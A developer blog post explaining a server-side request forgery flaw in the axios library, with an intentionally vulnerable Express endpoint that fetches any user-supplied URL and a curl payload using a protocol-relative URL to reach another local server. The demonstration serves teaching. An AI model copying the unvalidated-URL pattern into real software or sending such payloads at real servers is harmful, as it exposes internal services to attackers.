Yesterday, I was happily finishing an upgrade at work, and everything seemed perfect 😄. All the dependencies migrated smoothly, and my npm audit looked great 🚀. But then…
Server-Side Request Forgery in axios ⚠️
https://github.com/advisories/GHSA-8hc4-vh64-cxmj
I spent a lot of time fixing things, only to see that stupid message 😡. My OCD was driving me crazy 🤯.
And, I said, hmmm how exactly this error works? what the hell is SSRF? I'll try to explain fast the concept and share with you the discovery :D
SSRF, or Server-Side Request Forgery, is like tricking your server into being an unintentional errand boy 🕵️♂️. It’s when a hacker gets your server to make requests to places it shouldn’t, kind of like sending your dog to fetch a stick but it comes back with a bomb instead 💣. (from ChatGPT 😍)
In code please!
Normally, axios works, in your server when you need to do some external request to https://some-domain.com/api/, you can do something like this:
const instance = axios.create({
baseURL: 'https://jsonplaceholder.typicode.com/',
timeout: 1000,
headers: { accept: 'application/json' }
});
In theory, this is our innocent and pure server meant to fetch resources from jsonplaceholder:
const axios = require('axios');
const express = require('express');
const instance = axios.create({
baseURL: 'https://jsonplaceholder.typicode.com/',
timeout: 1000,
headers: { accept: 'application/json' },
});
const app = express();
const port = 3000;
app.use(express.json());
app.post('/fetch-data', async (req, res) => {
const url = req.body.url;
try {
const response = await instance.get(url);
console.log(response.data);
res.json(response.data);
} catch (error) {
console.error(error);
console.log('URL:', url);
res
.status(500)
.json({ message: 'Error fetching data', error: error.message });
}
});
app.listen(port, () => {
console.log(`Server running on http://localhost:${port}`);
});
You can try this one on terminal:
curl -X POST http://localhost:3000/fetch-data \
-H "Content-Type: application/json" \
-d '{"url": "/todos/1"}'
The response is like this:
{"userId":1,"id":1,"title":"delectus aut autem","completed":false}
everything is beautiful, but...
Now, if you have another server (acting as a malicious server) on http://localhost:4000, what happens when the user tests it:
const axios = require('axios');
const express = require('express');
const app = express();
const port = 4000;
app.use(express.json());
app.get('/private-data', async (req, res) => {
const url = req.body.url;
try {
console.log('Private URL:', url);
console.log('WTF??????');
res.send({ message: 'Data fetched' });
} catch (error) {
console.error(error);
console.log('URL:', url);
res.status(500).send('Error fetching data');
}
});
app.listen(port, () => {
console.log(`Server running on http://localhost:${port}`);
});
Try again
curl -X POST http://localhost:3000/fetch-data \
-H "Content-Type: application/json" \
-d '{"url": "//localhost:4000/private-data"}'
you will get this response:
{"message":"Data fetched"} # data from other server!
“So, this is really bad 😱 because you’re trusting the axios instance. The good news is that within a day, the issue in axios was successfully fixed in version 1.7.4 🎉.”
If you want to play with this, please check the experiment here 👇
Top comments (1)
Great explanation, I finally understood this vulnerability, thanks for sharing.